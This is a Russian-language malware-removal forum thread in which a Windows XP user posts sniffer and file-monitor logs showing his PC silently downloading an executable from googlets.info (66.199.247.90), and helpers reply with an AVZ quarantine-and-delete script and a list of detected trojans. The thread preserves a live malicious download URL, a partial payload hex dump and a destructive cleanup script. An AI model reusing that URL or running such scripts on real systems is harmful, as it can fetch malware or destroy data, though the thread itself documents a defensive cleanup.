Вот такая у меня ситуация

[AlexKlm]

При установлении удаленного соединения,
даже не подключая интернет эксплорер
происходит следующее, согласно логу
программы HTTPLook v1.251:
от моего компа:
66.199.247.90.80
GET /load/kik.php?v=13&c=22444B4346529E3D&h= HTTP/1.1
Host: googlets.info
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 9
ответ моему компу:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2008 17:00:39 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Content-transfer-encoding: binary
Content-Length: 18
P6 ЬЃH0|Ц—G2
c•—$
от моего компа:
GET /load/kik.php?g=TSIwJQrQlE1AedWVQTUIaOWFbUiATHqEk3BcUVqu dB20D|Hi HTTP/1.1
Host: googlets.info
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 9
ответ моему компу:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2008 17:00:44 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Content-Length: 31744
000000 01 4D 68 E4 A2 79 02 4D E2 A1 78 00 C5 AE A0 B6 .Mhдўy.MвЎx.Е® ¶
000010 91 34 D5 6D 4B BC B2 41 2E 60 70 98 44 2F 83 3D ‘4ХmKјІA.`p�D/ѓ=
000020 D4 C3 FD AE 43 DE DA 6E 2B E2 22 52 AD 82 12 D3 ФГ.®CЮЪn+в"R­‚..
000030 B5 90 E5 55 95 2D B9 7B 98 25 D3 0D 98 9E 65 59 µђеU•-№{�%..�ћeY
000040 39 B9 4F DE BC BF A1 8B C7 01 96 06 98 C7 CA 9A 9№OЮјїЎ‹З.–.�ЗКљ
........
.........
007BC0 C0 D2 DC 9C 31 90 E2 4D 5A 30 1C 48 4D 24 32 75 АТЬњ1ђвMZ0.HM$2u
007BD0 50 E1 44 08 30 83 FC A5 E3 22 9F 32 D1 E4 EE E3 PбD.0ѓь.г".2Сдог
007BE0 0C 7A ED A2 66 14 35 0F C2 58 DA DF 53 69 22 CD .z.ўf.5.ВXЪЯSi"Н
007BF0 E3 26 73 13 5C E2 43 39 0B 77 5F 4D 40 C4 E0 B2 г&s.\вC9.w_M@ДаІ
--------------------------------------------------------------------------
Мне интересно, где может быть прописано чтобы
без моего т.с. согласия, компьютер загружал файл?
И почему он из php файла сделал exe-файл?
Привожу синхронный лог из программы Filemon:
0:01:48 System:4 IRP_MJ_CLOSE E:\Documents and Settings\All Users.WINDOWS\
Application Data\Microsoft\Network\Connections\Pbk\rasphone.pb k SUCCESS
0:01:57 System:4 IRP_MJ_WRITE* E:\DOCUME~1\ALEXKL~1.ALE\LOCALS~1\
Temp\googlets.info_load_kik.php.htm SUCCESS Ofs: 0 Len: 4096
0:01:57 System:4 IRP_MJ_SET_INFORMATION*
...\Temp\googlets.info_load_kik.php.htm SUCCESS Len: 4096
0:01:59 System:4 IRP_MJ_WRITE*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 4096
0:01:59 System:4 IRP_MJ_SET_INFORMATION*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 4096
0:01:59 System:4 IRP_MJ_CLOSE
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
0:02:00 System:4 IRP_MJ_WRITE*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 4096
0:02:00 System:4 IRP_MJ_SET_INFORMATION*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 4096
0:02:00 System:4 IRP_MJ_CLOSE
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
0:02:01 System:4 IRP_MJ_WRITE*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 4096
0:02:01 System:4 IRP_MJ_SET_INFORMATION*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 4096
0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 118784 Len: 4096
0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 1335296 Len: 4096
0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 16384 Len: 4096
0:02:03 System:4 IRP_MJ_CLOSE
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
0:02:03 System:4 IRP_MJ_WRITE*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 12288
0:02:03 System:4 IRP_MJ_SET_INFORMATION*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 12288
0:02:04 System:4 IRP_MJ_CLOSE
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
0:02:04 System:4 IRP_MJ_WRITE*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 8192 Len: 8192
0:02:04 System:4 IRP_MJ_SET_INFORMATION*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 16384
0:02:04 System:4 IRP_MJ_CLOSE
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
0:02:05 System:4 IRP_MJ_WRITE*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 12288 Len: 4096
0:02:05 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
0:02:05 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
0:02:05 System:4 IRP_MJ_SET_INFORMATION*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 16384
0:02:05 System:4 IRP_MJ_CLOSE
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 24576 Len: 8192
0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 36864 Len: 12288
0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 53248 Len: 4096
0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 61440 Len: 4096
0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 16384 Len: 8192
и здесь из файла googlets.info_load_kik.php.Unknown он превращается...
0:02:11 System:4 IRP_MJ_SET_INFORMATION*
E:\DOCUME~1\NETWOR~1.000\LOCALS~1\Temp\NT46432.exe SUCCESS Len: 31744
0:02:14 System:4 IRP_MJ_WRITE*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 12288 Len: 20480
0:02:14 System:4 IRP_MJ_SET_INFORMATION*
...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 32768
0:02:34 System:4 IRP_MJ_CLOSE
E:\DOCUME~1\NETWOR~1.000\LOCALS~1\Temp\NT46432.exe SUCCES
Остается только запустить. Вот вам и обновление системы прям таки
как от Microsoft, все автоматически. Хотя везеде где можно
я поотключал обновление, также - все выполнения и загрузку бинарников.
Возможно система ослаблена после недавнего посещения
вирусом.
Пока не могу найти откуда берется адрес 66.199.247.90.80
и googlets.info, какой механизм действует? Искал поголовно во
всех файлах - не нашел, возможно система препятствует,
попробую зайти из другого виндовса. Как найти причину -
море проблем, а как загружать "ОБНОВЛЕНИЕ" - пожалуйста.
Не потенциальный ли вирус в самой системе, она же еще
и запуститит этот файл при случае.
Посоветуйте пожалуйста антивирус который следит за
появлением во временный файлах интернета экзешников
и сразу их убивает. Мне не хочется ставить грмоздкую
программу и тормозить компьютер. Желательно чтобы он сохранял
текущие утановки безопасности и сигнализировал об их изменении.
У меня XP SP2. Там в логах не правда, не Windows95, и не IE5, а IE6.

[drongo]

http://virusinfo.info/showthread.php?t=1235

[AlexKlm]

А вторая ссылка - http://www.internetmap.info/cgi-bin/...?site_id=30393
- пустая страница а в статубаре - "Готово". Это что там должно было быть?
У меня переадресация в IE отключена. Это конечно не нормально, но нах надо ездить по путым страницам?

Добавлено через 5 часов 0 минут

Поискал я из другого виндовса эти выражения - ничего не найдено,
кроме, кроме одного или двух файликов с раширением .dat которые
недоступны для чтения пока работает система (или вирус, - что мало верятно). Получатся что это работает ОБНОВЛЕНИЕ. Антивирус AWZ указал на прорехи в защите, на пару фалов из них два - от Creative Technology (карта у меня Audigy 2ZS), после анализа (запуска с логированием) оказалось что устанавливается хук на SHELL. Сомнительная потребность, надо же, даже солидные производители не
стыдятся создавать мусор в системе. Я не думаю что это так уж необходимо, раньше-то не требовалось и все работало.
А вот с прорехами в защите - потруднее, может со временем разбирусь. А пока слова :
>> Службы: разрешена потенциально опасная служба SSDPSRV (Служба обнаружения SSDP)
>> Службы: разрешена потенциально опасная служба Schedule (Планировщик заданий)

пока не знаю таких, но поищу в Службах. Может и найду. Я там и так почти все запретил что можно, однако ж.
Да, эти службы был в положении Вручную. Теперь я их поставлю в положение Отключено.
В том-то и дело, что следить за состоянием этих служб надо,
а не вспоминать о них когда обнаружен излишний трафик в
интернете.

Вообще-то говоря, искать надо сочинителей вирусов, и это не так уж и сложно (даже я нашел пару сайтов, из них один в Москве, другой зарубежом, и у этого - 66.199.247.90 есть хозяин), и потом этих сочинителей привлекать к уголовной ответственности, и делать это публично, чтобы другим повадно не было.

[AlexKlm]

Зайцев Олег! Вы бы лучше рассказали механизм проникновения дряни через скрипт, а то я никак не могу понять, где же дыра в системе. Все получаю и получаю скрипты превращающиеся в исполняемый модуль. Дыра начинается с того что по началу удаленного соединения мой комп вызывает google.com (или еще какой-либо сайт). И отчего это происходит не могу выяснить, уже все видимые файлы на диске с содержанием этого слова заменил на другое, и - бесполезно. Единственное что я не могу сделать - проверить где это зашифровано. Или дайте пожалуйста ссылку где объясняется этот феномен, желательно словами программиста.

[AndreyKa]

Выполните Правила.

[AlexKlm]

Вот журналы обследования 'пациета'. Может они что-то подскажут новое для знающих людей.

[AlexKlm]

Прописал я в hostes и lmhost.sam так как где-то тут на сайте сказано, - болт! Не реагирует ни система ни IE6. В свойствах TCP я разрешил использовать хост-файл(ы). Полные потёмки. А на гугл запросы идут по 80 естественно порту, хоть волком вой.

[AndreyKa]

Запустите AVZ.
Выполните скрипт через меню Файл:

Код:

begin
 SetAVZGuardStatus(True);
 ClearQuarantine;
 QuarantineFile('E:\WINDOWS\system32\basemaqev32.dll','');
 QuarantineFile('D:\autorun.exe','');
 QuarantineFile('D:\autorun.inf','');
 QuarantineFile('C:\MYutil\TdiMonNt\Viruses\gon.exe','');
 QuarantineFile('C:\MYutil\TdiMonNt\Viruses\pinch.exe','');
 QuarantineFile('C:\MYutil\TdiMonNt\Viruses\Windows\winlogon.exe','');
 QuarantineFile('D:\Ещё\Crackz\WarezP2P_CWS.exe','');
 QuarantineFile('E:\WINDOWS\winlogon.exe','');
 DeleteFile('C:\BATC\MAIL\NataKlm\Attach\FOTO.ZIP');
 DeleteFileMask('C:\System Volume Information\_restore{7EB25BA4-1249-4D63-B0D8-728091AE44AD}', '*.*', true);
 BC_ImportAll;
 ExecuteSysClean;
 BC_Activate;
 RebootWindows(false);
end.

Компьютер перезагрузится.
Пришлите то, что попадет в карантин так, как написано в приложении 3 Правил по ссылке http://virusinfo.info/upload_virus.php?tid=22861

[AlexKlm]

Вас понял, сэр! Так и сделаю. Только тот винлогон что в виндовсе - это мой системный только для чтения файл - замена настоящему вирусу, а то винлогонов развелось - море. А если были и вирусы - они давно удалены (кроме тех что я никогда не запускал) или имеют прикрученные патчи чтобы они далеко не убежали, я их исследую. Но это трудное занятие, продвигается медленно. Хотелось бы все-таки получить ответ на мой вопрос о способе проникновения. Не проще ли в систему вмонтировать заглушку для всякой попытки загружать бинарники пришедшие по сети на выполнение. Их сразу логично бы поместить в карантин и оставить на ответственность пользователя. Только это делать надо так чтобы имена всех атрибутов протектора были полиморфными, тогда ни один вирус не сможет приспособиться.

И самое интересное: у меня перестал опрашиваться google.com (ru), я понял примерно почему это происходит. В первую очередь - виновата система. Но помогло то, что я в файле hosts прописал не несуществующий в данный момент сайт, имя которого указано в инструкции (примере), а свой, котрый без вирусов разумеется и существующий в интернете.
Но кто же тянет за язык систему что надо обязательно что-то там запросить по установлению удаленного соединения? Вообще хотелось бы узнать как должно быть на самом деле?

Добавлено через 1 час 37 минут

Результат загрузки
Файл сохранён как 080516_115343_Quarantine_482dbc179aaaa.zip
Размер файла 955267
MD5 34c24be845f57be9faba813738709658

Пояснение: gon.exe - это тот же winlogon.exe, я переименовал когда работал с ним.
Сложный процесс, запускает себя через CMD.exe, правда - убиватся просто.
А вот был другой вирус, так тот в цепочке PEB_LDR_DATA->LIST_ENTRY вычищал строки, его-то и убить из кольца 3 невозможно было. Пришлось убивать сами файлы (он раздваивается при выполнении) из другой ОС. Того звали found[1].exe, его AWZ не обнаружил т.к. я ему имя kernel32 заменил на другое. Не сомневаюсь, что он был загружен под именем типа found.php и тут же любезно наспакованный системой в реальное имя. Вот такое, понимаешь, ОБНОВЛЕНИЕ.

[AndreyKa]

Папку C:\MYutil\TdiMonNt\Viruses лучше удалить.
В файле D:\Ещё\Crackz\WarezP2P_CWS.exe - Downloader.Win32.Agent.h (Trojan.DownLoader.10412)
C:\BATC\Мусор\Dorithie.zip - Trojan-Downloader.Win32.Bagle.g
F:\_Distr\Старое\secret-porn-video.zip - Backdoor.Win32.Delf.co
Антивируса у вас нет, запустите случайно, будет веселье...

Хотелось бы все-таки получить ответ на мой вопрос о способе проникновения. Не проще ли в систему вмонтировать заглушку для всякой попытки загружать бинарники пришедшие по сети на выполнение.

Что то в этом роде реализовано в системах HIPS. В большинстве случаев все проще. Заражение происходит от того, что только что установив Windows пользователь отправляется гулять по сайтам, и на первом же из взломанных (их сотни тысяч) получает через дыры в IE троянов.
Сделайте новый лог из 10-го пункта Правил и приложите сюда.

[AlexKlm]

Так я знаю где у меня вирусы лежат. Это я исследую их, запускаю, но выполнять
АПИ на порчу системы не разрешаю. Я их просто мучаю, смотрю как они беспомощно бьются в попытке завладеть системой. Как они запускют севисы, отключают безопасность, что где смотрят. Нашел много нового для себя.

Только вот про autorun.exe я не знал, а всякое там с порно сайтов - это я и не пытался запускать, это я забыл удалить.
Может было желание посмотреть что они там выслали. Дураков ищут.

Пытаюсь воссоздать ситуацию когда мой комп выходил в интернет с запросом. Восстановил файлы hosts и lmhost, не получается пока.

Сделаю как Вы сказали. Приступаю.

[AlexKlm]

Пыполнил пункт 10.
Но, но при проверке папки MyUtil AWZ не заметил
вирус присланный по интернету во временных фалйлах, и может не один. Я тут прикреплю Viruses3.zip, но без пароля, будте внимательны!, там неопознанные AWZ вирусы. Я дважды сканировал им и он ничего не заметил.

[V_Bond]

карантин отправте как написано в правилах ( как не скажу, хочу что бы почитали)... из темы убрать ...

[drongo]

уже убрал

[AndreyKa]

autorun.exe лаборатория Касперского посчитала безопасным, в его свойствах написано, что это "AutoPlay Menu Loader" разработчика Linasoft.
В логе ничего вредоносного не увидел.
Ваша проблема была из-за файла E:\WINDOWS\system32\basemaqev32.dll его можно удалить.
Странностей в работе компьютера больше нет?

[AlexKlm]

Больше нет пока, как ни странно. Нет интернет трафика. Однажды вроде бы был, но я не смог его зафиксировать ни по 80 порту и с помощью TDIMon.

"Не постите и не прикрепляйте никакие другие файлы" -
Прошу прощения, я думал что это Вам надо а не мне. Не нашли - отлично, но я другого мнения, возможно я ошибаюсь, все мы иногда ошибаемся. Спасибо за помощь. Я продолжу проверку этой dll, как она запустится - я дам знать. В реестре и в популярных директориях ссылку на нее пока не нашел, ищу.

[AndreyKa]

Не постите и не прикрепляйте никакие другие файлы" -
Прошу прощения, я думал что это Вам надо а не мне.
...
Я продолжу проверку этой dll, как она запустится - я дам знать. В реестре и в популярных директориях ссылку на нее пока не нашел, ищу.

К нам и так приходит огромное количиство "мусора" из-за перестраховки и недопонимания.
Ссылку в реестре на dll удалил скрипт.

[AlexKlm]

Нет, не нашел, все в порядке, нигде ссылки на неё нет. Спасибо за помощь, вопросов больше нет.

[CyberHelper]

Статистика проведенного лечения:

• Получено карантинов: 1
• Обработано файлов: 16
• В ходе лечения обнаружены вредоносные программы:
  
  1. c:\\myutil\\tdimonnt\\viruses\\gon.exe - Trojan-Proxy.Win32.Small.oo (DrWEB: Trojan.Packed.573)
  2. c:\\myutil\\tdimonnt\\viruses\\pinch.exe - Trojan.Win32.Buzus.gqw (DrWEB: Trojan.PWS.LDPinch.1941)
  3. c:\\myutil\\tdimonnt\\viruses\\windows\\winlogon.e xe - Trojan-Proxy.Win32.Small.oo (DrWEB: Trojan.Packed.573)
  4. d:\\ещё\\crackz\\warezp2p_cws.exe - not-a-virusownloader.Win32.Agent.h (DrWEB: Trojan.DownLoader.10412)
  5. e:\\windows\\system32\\basemaqev32.dll - Trojan.Win32.SubSys.dl (DrWEB: Trojan.Okuks.based)